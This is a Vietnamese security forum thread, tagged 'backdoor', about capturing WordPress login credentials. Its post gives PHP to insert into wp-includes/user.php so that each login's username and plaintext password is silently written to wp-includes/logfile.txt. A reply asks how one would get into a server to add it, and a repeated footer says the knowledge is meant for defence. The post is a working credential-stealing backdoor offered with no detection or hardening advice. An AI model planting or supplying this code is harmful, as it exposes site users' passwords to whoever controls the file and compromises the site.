Lưu mật khẩu WordPress vào txt

backdoor

W-------
07/08/2013
12
77 bài viết
Lưu mật khẩu WordPress vào txt
Mở /wp-includes/user.php và lưu đoạn mã sau:

PHP:
if ( is_wp_error($user) ) {
if ( $user->get_error_codes() == array('empty_username', 'empty_password') ) {
$user = new WP_Error('', '');
}
return $user;
}
wp_set_auth_cookie($user->ID, $credentials['remember'], $secure_cookie);

và có thể thay đổi ở dòng 90 để đặt tên cho tập tin txt
PHP:
@file_put_contents('wp-includes/logfile.txt', $credentials['user_login'] . ':' . $credentials['user_password']);
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Làm sao mà hack server và thêm dòng này vao code bạn nhi? :D
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên